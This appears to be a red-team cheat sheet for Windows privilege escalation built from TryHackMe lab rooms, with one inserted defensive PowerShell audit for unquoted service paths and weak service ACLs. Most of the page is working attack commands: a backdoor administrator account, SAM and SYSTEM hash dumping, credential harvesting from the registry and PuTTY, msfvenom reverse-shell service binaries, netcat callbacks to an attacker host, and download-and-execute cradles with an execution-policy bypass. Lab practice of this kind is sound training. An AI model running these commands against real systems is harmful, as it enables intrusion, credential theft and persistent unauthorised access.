# Windows

**Copy info from here:** [**https://tryhackme.com/room/windowsprivesc20**](https://tryhackme.com/room/windowsprivesc20)

## **Gathering Info**

```
whoami /priv
```

```
net user
```

```
systeminfo
```

```
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
```

```
dir c:\
```

```
dir "c:\program files"
```

```
dir "c:\program files (x86)"
```

```
wmic service get name,startname
```

```
wmic service get name,pathname,startname | findstr "Program Files"
```

Find text in a file

```
type C:\Windows\path\to\file\$FILE | findstr $STRING
```

Find passwords in the registry

```
reg query HKLM /f password /t REG_SZ /s
```

### **Whoami /priv**

| Finding                | Comment                                                  | Examples                                                                                                         |
| ---------------------- | -------------------------------------------------------- | ---------------------------------------------------------------------------------------------------------------- |
| SeImpersonatePrivilege | PrintSpoofer (works on Windows 10 and Server 2016/2019)  | [Relevant](/red-team/walkthroughs/tryhackme/relevant.md), [Stealth](/red-team/walkthroughs/tryhackme/stealth.md) |
| SeImpersonatePrivilege | Using EfsPotato                                          | [Stealth](/red-team/walkthroughs/tryhackme/stealth.md)                                                           |

## Harvesting Passwords from Usual Spots

You might find interesting files by looking at what was recently accessed: Start -> Run -> `recent`.

<figure><img src="/files/rnAJnfxGBhzsi0EEWuKH" alt=""><figcaption></figcaption></figure>

### **Powershell history**

**Examples**

[Windows Privilege Escalation](/red-team/walkthroughs/tryhackme/windows-privilege-escalation.md#harvesting-passwords-from-usual-spots)

**Victim(cmd)**

```
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
```

### Saved credentials (cmdkey)

**Examples**

[Windows Privilege Escalation](/red-team/walkthroughs/tryhackme/windows-privilege-escalation.md#harvesting-passwords-from-usual-spots)

You need a GUI session to see the other command prompt that runas will spawn.

**Victim(cmd)**

```
cmdkey /list
runas /savecred /user:$DOMAIN\$USERNAME cmd.exe
```

### PuTTY saved sessions

**Examples**

[Windows Privilege Escalation](/red-team/walkthroughs/tryhackme/windows-privilege-escalation.md#harvesting-passwords-from-usual-spots)

Retrieve the password stored in a saved PuTTY session under your profile.

**Victim(cmd)**

```
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s
```

### See hidden files

**Examples**

[Anthem](/red-team/walkthroughs/tryhackme/anthem.md)

<figure><img src="/files/y6LGAXlNoIdmjWJ79LUZ" alt=""><figcaption></figcaption></figure>

### SYSTEM and SAM

#### Download the SYSTEM and SAM hives

**Examples**

[Windows Local Persistence](/red-team/walkthroughs/tryhackme/windows-local-persistence.md#tampering-with-unprivileged-accounts)

**Kali(WinRM)**

```
reg save hklm\system system.bak
reg save hklm\sam sam.bak
download system.bak
download sam.bak
```

#### Dump hashes

**Examples**

[Windows Local Persistence](/red-team/walkthroughs/tryhackme/windows-local-persistence.md#tampering-with-unprivileged-accounts)

**Kali**

```
python3.9 /opt/impacket/examples/secretsdump.py -sam sam.bak -system system.bak LOCAL
```

## Add User & Assign Group Memberships

**Victim**

```
net user backdoor pass!123 /add
net localgroup Administrators backdoor /add
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v forceguest /t reg_dword /d 0 /f
```

### **Enable RDP**

**Victim**

```
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
```

### Add user to RDP Group

**Examples**

[Windows Local Persistence](/red-team/walkthroughs/tryhackme/windows-local-persistence.md#assign-group-memberships)

Add the user to a group that allows remote access. Note that Remote Management Users grants WinRM access; RDP logon is controlled by the Remote Desktop Users group.

**Victim(cmd)**

```
net localgroup "Remote Management Users" $USER /add
```

## Scheduled Tasks

**Examples**

[Windows Privilege Escalation](/red-team/walkthroughs/tryhackme/windows-privilege-escalation.md)[Windows Local Persistence](/red-team/walkthroughs/tryhackme/windows-local-persistence.md#abusing-scheduled-tasks)

Looking at the scheduled tasks on the target system, you may find one that has either lost its binary or uses a binary you can modify.

Scheduled tasks can be listed from the command line using the schtasks command without any options. To retrieve detailed information about any of the tasks, you can use a command like the following one:

**Victim(cmd)**

```
schtasks
```

**Victim(cmd)**

```
schtasks /query /tn $TASK /fo list /v
```

<figure><img src="/files/1umnWBXMTuqLYxnycOGw" alt=""><figcaption></figcaption></figure>

**Victim(cmd)**

```
icacls c:\tasks\schtask.bat
```

<figure><img src="/files/3j4XZeM4u0VGAvzmcAEN" alt=""><figcaption></figcaption></figure>

**Kali**

```
nc -lvnp 4444
```

**Victim**

```
echo c:\tools\nc64.exe -e cmd.exe $KALI 4444 > C:\tasks\schtask.bat
schtasks /run /tn $TASK
```

## Abusing Service Misconfigurations

**Examples**

[Windows Privilege Escalation](/red-team/walkthroughs/tryhackme/windows-privilege-escalation.md#abusing-service-misconfigurations)

### Insecure Permissions on Service Executable

**Get the flag on svcusr1's desktop**

**Victim(cmd)**

```
sc qc WindowsScheduler
```

<figure><img src="/files/5qJADj3xInqdpMRoFaIy" alt=""><figcaption></figcaption></figure>

**Victim(cmd)**

```
icacls C:\PROGRA~2\SYSTEM~1\WService.exe
```

<figure><img src="/files/Q3BmW5fD1wJMfJiL8DTH" alt=""><figcaption></figcaption></figure>

**Kali**

```
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$KALI LPORT=4445 -f exe-service -o rev-svc.exe
python2 -m SimpleHTTPServer 81
```

**Victim(Powershell)**

```
wget http://$KALI:81/rev-svc.exe -O rev-svc.exe
```

Once the payload is in the Windows server, we proceed to replace the service executable with our payload. Since we need another user to execute our payload, we'll want to grant full permissions to the Everyone group as well.

**Victim(Powershell)**

```
cd C:\PROGRA~2\SYSTEM~1\
move WService.exe WService.exe.bkp
move C:\Users\thm-unpriv\rev-svc.exe WService.exe
icacls WService.exe /grant Everyone:F
```

**Kali**

```
nc -lvp 4445
```

**Note:** PowerShell has sc as an alias to Set-Content, therefore you need to use sc.exe in order to control services with PowerShell this way.

After restarting the service, you'll get a reverse shell with svcusr1 privileges:

**Victim(cmd)**

```
sc stop windowsscheduler
sc start windowsscheduler
```

**OR**

**Victim(Powershell)**

```
sc.exe stop windowsscheduler
sc.exe start windowsscheduler
```

<figure><img src="/files/c4wAd9ypG8Mw5IpMZfNA" alt=""><figcaption></figcaption></figure>

### Unquoted Service Paths

**Examples**

[Windows Privilege Escalation](/red-team/walkthroughs/tryhackme/windows-privilege-escalation.md#unquoted-service-paths)

**Victim(cmd)**

```
sc qc "disk sorter enterprise"
```

<figure><img src="/files/gCbZ9kezqGFjKoArEDtJ" alt=""><figcaption></figcaption></figure>

**Kali**

```
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$KALI LPORT=4446 -f exe-service -o rev-svc2.exe
python2 -m SimpleHTTPServer 81
```

**Victim(Powershell)**

```
wget http://10.10.15.215:81/rev-svc2.exe -O rev-svc2.exe
move C:\Users\thm-unpriv\rev-svc2.exe C:\MyPrograms\Disk.exe
icacls C:\MyPrograms\Disk.exe /grant Everyone:F
```

**Kali**

```
nc -lvp 4446
```

**Victim(cmd)**

```
sc.exe stop "disk sorter enterprise"
sc.exe start "disk sorter enterprise"
```

<figure><img src="/files/aKxJBXTYt6Y2QBHin2SS" alt=""><figcaption></figcaption></figure>
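A hardening audit for the two weaknesses shown above (a scheduled task or service whose binary a low-privileged user can replace, and an unquoted service path containing spaces), as an added PowerShell example that is not part of the original page or the TryHackMe room: it reports services and scheduled tasks whose program path is unquoted with spaces, or whose executable grants write-class rights to Everyone, Users, Authenticated Users or INTERACTIVE. The function names and principal list are my own choices; it assumes an elevated PowerShell 5.1+ session with the ScheduledTasks module.

```powershell
# Added audit example, not from the original page: report services and scheduled
# tasks whose program path is unquoted and contains spaces, or whose executable
# grants write-class rights to broad principals. Run from an elevated prompt.
$BroadPrincipals = @('Everyone', 'BUILTIN\Users',
                     'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
$WriteMask = [System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl, Delete, TakeOwnership, ChangePermissions'

function Get-ExecutablePath {
    # Extract the program from a service binPath or task action string.
    param([string]$Command)
    if ([string]::IsNullOrWhiteSpace($Command)) { return $null }
    $Command = [Environment]::ExpandEnvironmentVariables($Command)
    if ($Command.StartsWith('"')) { return $Command.Split('"')[1] }
    $m = [regex]::Match($Command, '^(.+?\.(exe|bat|cmd|ps1))', 'IgnoreCase')
    if ($m.Success) { return $m.Groups[1].Value }
    return $Command.Split(' ')[0]
}

function Test-BroadWriteAccess {
    # True when a broad principal holds any write-class right on the file.
    # The parent directory's ACL matters as well (move/replace); check it the same way.
    param([string]$Path)
    if ([string]::IsNullOrEmpty($Path) -or -not (Test-Path -LiteralPath $Path)) { return $false }
    foreach ($ace in (Get-Acl -LiteralPath $Path).Access) {
        if ($ace.AccessControlType -eq 'Allow' -and
            $BroadPrincipals -contains $ace.IdentityReference.Value -and
            (($ace.FileSystemRights -band $WriteMask) -ne 0)) { return $true }
    }
    return $false
}

function Test-UnquotedPath {
    # Unquoted path with a space: the service loader probes each truncated prefix first.
    param([string]$Command, [string]$Exe)
    return [bool]($Command -and -not $Command.StartsWith('"') -and $Exe -match ' ')
}

$findings = @(foreach ($svc in Get-CimInstance Win32_Service) {
    $exe = Get-ExecutablePath $svc.PathName
    [pscustomobject]@{ Kind = 'Service'; Name = $svc.Name; RunsAs = $svc.StartName; Exe = $exe
                       Unquoted = Test-UnquotedPath $svc.PathName $exe; WeakAcl = Test-BroadWriteAccess $exe }
})
$findings += @(foreach ($task in Get-ScheduledTask) {
    foreach ($action in ($task.Actions | Where-Object { $_.Execute })) {
        $exe = Get-ExecutablePath $action.Execute
        [pscustomobject]@{ Kind = 'Task'; Name = $task.TaskName; RunsAs = $task.Principal.UserId; Exe = $exe
                           Unquoted = $false; WeakAcl = Test-BroadWriteAccess $exe }
    }
})
$findings | Where-Object { $_.Unquoted -or $_.WeakAcl } | Format-Table -AutoSize
```

Remediation for each finding is to quote the binPath (`sc.exe config <name> binPath= "\"C:\Program Files\app\app.exe\""`) and to remove write rights for broad principals from the binary and its directory with icacls.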

### Insecure Service Permissions

**Examples**

[Windows Privilege Escalation](/red-team/walkthroughs/tryhackme/windows-privilege-escalation.md#insecure-service-permissions)

**Victim(cmd)**

```
cd C:\tools\AccessChk
accesschk64.exe -qlc thmservice
```

<figure><img src="/files/McCV27YyM5SU0QY6aCJv" alt=""><figcaption></figcaption></figure>

**Kali**

```
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$KALI LPORT=4447 -f exe-service -o rev-svc3.exe
python2 -m SimpleHTTPServer 81
```

**Victim(Powershell)**

```
wget http://10.10.15.215:81/rev-svc3.exe -O rev-svc3.exe
```

**Kali**

```
nc -lvp 4447
```

**Victim(Powershell)**

```
icacls C:\Users\thm-unpriv\rev-svc3.exe /grant Everyone:F
sc.exe config THMService binPath= "C:\Users\thm-unpriv\rev-svc3.exe" obj= LocalSystem
sc.exe stop THMService
sc.exe start THMService
```

<figure><img src="/files/ldK9TWvoQhFYB9UgBeso" alt=""><figcaption></figcaption></figure>

## Abusing dangerous privileges

**Examples**

[Windows Privilege Escalation](/red-team/walkthroughs/tryhackme/windows-privilege-escalation.md#abusing-dangerous-privileges)

<figure><img src="/files/sMMA3WmR6uGKloQRjfm4" alt=""><figcaption></figcaption></figure>

**Kali**

```
nc -lvp 4442
```

**Victim(Browser)**

```
c:\tools\RogueWinRM\RogueWinRM.exe -p "C:\tools\nc64.exe" -a "-e cmd.exe 10.10.22.165 4442"
```

<figure><img src="/files/843rt88WjbV1MsD4e9hq" alt=""><figcaption></figcaption></figure>

## Bypassing UAC

**Examples:**

[Bypassing UAC](/red-team/walkthroughs/tryhackme/bypassing-uac.md)

## Bypassing Applocker

**Examples:**

[Corp](/red-team/walkthroughs/tryhackme/corp.md#bypassing-applocker)

Load PowerUp.ps1 into memory.

**Kali**

```
wget https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1
python2 -m SimpleHTTPServer 81
```

Add the following line at the bottom of PowerUp.ps1 so it invokes all checks automatically once downloaded.

**PowerUp.ps1**

```
Invoke-AllChecks
```

**Victim(powershell)**

```
powershell -ep bypass
iex (New-Object Net.WebClient).DownloadString('http://$KALI:81/PowerUp.ps1')
```

<figure><img src="/files/4dhOuBQweIMOB12G4Rom" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/2IZRIP2SETgHrbzkGZrj" alt=""><figcaption></figcaption></figure>

**Kali**

```
echo "dHFqSnBFWDlRdjh5YktJM3lIY2M9TCE1ZSghd1c7JFQ=" | base64 -d
```

<figure><img src="/files/ZZa2Rnh0G2pSqq5rdRnl" alt=""><figcaption></figcaption></figure>

**Kali**

```
xfreerdp +clipboard /u:"Administrator" /v:$VICTIM:3389 /size:1024x568 /smart-sizing:800x1200
Password: tqjJpEX9Qv8ybKI3yHcc=L!5e(!wW;$T
```

## **Automated Enumeration Tools**

| Name                      | Link                                                                                      |
| ------------------------- | ----------------------------------------------------------------------------------------- |
| WinPeas                   |                                                                                           |
| PowerUp.ps1               | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1 |
| Windows Exploit Suggester | https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git                             |
| SharpHound                | `git clone https://github.com/BloodHoundAD/BloodHound.git`                                |
| Powerview                 |                                                                                           |

## **Juicy Potato**

**Examples**

[Retro](/red-team/walkthroughs/tryhackme/retro.md)

* Download Juicy Potato to your attack machine
* Upload Juicy Potato to the target (ex: via FTP, SMB, HTTP, etc.)
* Create a reverse shell and upload it to the target (ex: via FTP, SMB, HTTP, etc.)
* Use Juicy Potato to execute your reverse shell

```
wget https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe
```

```
JuicyPotato.exe -l 5050 -p C:\path\to\reverse-shell.exe -t *
```

## PowerUp.ps1

**Examples**

[Steel Mountain](/red-team/walkthroughs/tryhackme/steel-mountain.md#privilege-escalation)[Retro](/red-team/walkthroughs/tryhackme/retro.md)

**Setup**

**Kali**

```
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1
python2 -m SimpleHTTPServer 81
```

**Victim(cmd)**

```
certutil -urlcache -f http://10.10.228.214:81/PowerUp.ps1 PowerUp.ps1
. .\PowerUp.ps1
Invoke-AllChecks
```

**OR**

**Victim(powershell)**

```
powershell -ep bypass
iex (New-Object Net.WebClient).DownloadString('http://$KALI:81/PowerUp.ps1')
```

## Windows Exploit Suggester

**Examples**

[HackPark](/red-team/walkthroughs/tryhackme/hackpark.md)

**Setup**

Run the command on the victim, then paste the output into a file called systeminfo.txt on Kali.

**Victim**

```
systeminfo
```

**Kali**

```
git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git
cd Windows-Exploit-Suggester/
python3.9 windows-exploit-suggester.py --update
python3.9 windows-exploit-suggester2.py --database 2022-12-03-mssb.xls --systeminfo systeminfo.txt
```

## **WinPeas**

**Examples**

[HackPark](/red-team/walkthroughs/tryhackme/hackpark.md)

**Setup**

**Kali**

```
wget https://github.com/carlospolop/PEASS-ng/releases/download/20221127/winPEASx64.exe
python2 -m SimpleHTTPServer 82
```

**Victim**

```
cd C:\Windows\Temp
powershell "(New-Object System.Net.WebClient).Downloadfile('http://$KALI:82/winPEASx64.exe','winPEASx64.exe')"
winPEASx64.exe
```

## SharpHound

**Examples**

[Post-Exploitation Basics](/red-team/walkthroughs/tryhackme/post-exploitation-basics.md)

Add this line (shown below) to SharpHound.ps1 before transferring it, so the collector runs as soon as the script is loaded.

<figure><img src="/files/xPLv65ndmQvanqGqUzhg" alt=""><figcaption></figcaption></figure>

**Victim**

```
powershell -ep bypass
.\SharpHound.ps1
```

**Kali**

```
apt-get install bloodhound
neo4j console
bloodhound --no-sandbox
```

### Find all Domain Admins

<figure><img src="/files/XtQb8OKVZEGPE3FpQix3" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/lnQ9azNQlXmFbzbmStyy" alt=""><figcaption></figcaption></figure>

### List all Kerberoastable accounts

<figure><img src="/files/YWldPOXC1RJL4xFcNP0j" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/tp4iGzkMGjwixv3ua4CA" alt=""><figcaption></figcaption></figure>

## Powerview

**Examples**

[Post-Exploitation Basics](/red-team/walkthroughs/tryhackme/post-exploitation-basics.md)

**Victim**

Run the following to load PowerView so its commands are available.

```
powershell -ep bypass
. .\Downloads\PowerView.ps1
```

Enumerate the domain users.

```
Get-NetUser | select cn
```

Enumerate the domain groups.

```
Get-NetGroup -GroupName *admin*
```

Find Shared folders.

```
Invoke-ShareFinder
```

Get the operating systems of the computers in the domain.

```
Get-NetComputer -fulldata | select operatingsystem
```

